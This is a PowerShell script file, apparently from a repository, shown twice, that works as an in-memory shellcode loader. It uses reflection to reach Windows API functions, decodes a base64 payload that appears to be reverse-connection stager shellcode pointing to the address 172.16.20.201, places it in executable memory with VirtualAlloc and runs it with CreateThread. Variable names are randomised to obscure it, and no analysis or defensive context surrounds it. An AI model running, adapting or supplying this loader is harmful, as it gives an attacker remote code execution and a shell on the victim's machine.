macostag/pr.ps1

## pr.ps1
function q3 {
        Param ($g7mWY, $y0ZK)
        $mvajw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        return $mvajw.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mvajw.GetMethod('GetModuleHandle')).Invoke($null, @($g7mWY)))), $y0ZK))
}

function tma3R {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $v7E9,
                [Parameter(Position = 1)] [Type] $yu = [Void]
        )

        $qW = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $qW.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $v7E9).SetImplementationFlags('Runtime, Managed')
        $qW.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $yu, $v7E9).SetImplementationFlags('Runtime, Managed')

        return $qW.CreateType()
}

[Byte[]]$jWq = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2i7AQAA6DABAAAvWDVUQ084WTd2TXpxUnV0SHNKT0U2dzRBRFFEenM1RmVPYmdnV1QwbUZBNTZtbTdyUDB6U1FWTGszcGNqR1pGS00tU1VITk9GTGRvV3N6ZWxrUUpCVGJTajFzSXlaZTd2dlI3cm0wUWtwMnJaTmZObTE2a25tblV5cDJEN0JwRTNMV3lwSFdSOVIzTUI4NFFwbVZfakNaVGRycURaZVlSAFBoV4mfxv/VicZTaAAy4IRTU1NXU1Zo61UuO//VlmoKX2iAMwAAieBqBFBqH1ZodUaehv/VU1NTU1ZoLQYYe//VhcB1FGiIEwAAaETwNeD/1U91zehKAAAAakBoABAAAGgAAEAAU2hYpFPl/9WTU1OJ51doACAAAFNWaBKWieL/1YXAdM+LBwHDhcB15VjDX+hr////MTcyLjE2LjIwLjIwMQC78LWiVmoAU//V")

$eAq = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll VirtualAlloc), (tma3R @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $jWq.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($jWq, 0, $eAq, $jWq.length)

$bSvg = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll CreateThread), (tma3R @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$eAq,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll WaitForSingleObject), (tma3R @([IntPtr], [Int32]))).Invoke($bSvg,0xffffffff) | Out-Nullresource
	function q3 {
	Param ($g7mWY, $y0ZK)
	$mvajw = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

	return $mvajw.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mvajw.GetMethod('GetModuleHandle')).Invoke($null, @($g7mWY)))), $y0ZK))
	}

	function tma3R {
	Param (
	[Parameter(Position = 0, Mandatory = $True)] [Type[]] $v7E9,
	[Parameter(Position = 1)] [Type] $yu = [Void]
	)

	$qW = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$qW.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $v7E9).SetImplementationFlags('Runtime, Managed')
	$qW.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $yu, $v7E9).SetImplementationFlags('Runtime, Managed')

	return $qW.CreateType()
	}

	[Byte[]]$jWq = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2i7AQAA6DABAAAvWDVUQ084WTd2TXpxUnV0SHNKT0U2dzRBRFFEenM1RmVPYmdnV1QwbUZBNTZtbTdyUDB6U1FWTGszcGNqR1pGS00tU1VITk9GTGRvV3N6ZWxrUUpCVGJTajFzSXlaZTd2dlI3cm0wUWtwMnJaTmZObTE2a25tblV5cDJEN0JwRTNMV3lwSFdSOVIzTUI4NFFwbVZfakNaVGRycURaZVlSAFBoV4mfxv/VicZTaAAy4IRTU1NXU1Zo61UuO//VlmoKX2iAMwAAieBqBFBqH1ZodUaehv/VU1NTU1ZoLQYYe//VhcB1FGiIEwAAaETwNeD/1U91zehKAAAAakBoABAAAGgAAEAAU2hYpFPl/9WTU1OJ51doACAAAFNWaBKWieL/1YXAdM+LBwHDhcB15VjDX+hr////MTcyLjE2LjIwLjIwMQC78LWiVmoAU//V")

	$eAq = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll VirtualAlloc), (tma3R @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $jWq.Length,0x3000, 0x40)
	[System.Runtime.InteropServices.Marshal]::Copy($jWq, 0, $eAq, $jWq.length)

	$bSvg = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll CreateThread), (tma3R @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$eAq,[IntPtr]::Zero,0,[IntPtr]::Zero)
	[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q3 kernel32.dll WaitForSingleObject), (tma3R @([IntPtr], [Int32]))).Invoke($bSvg,0xffffffff) \| Out-Nullresource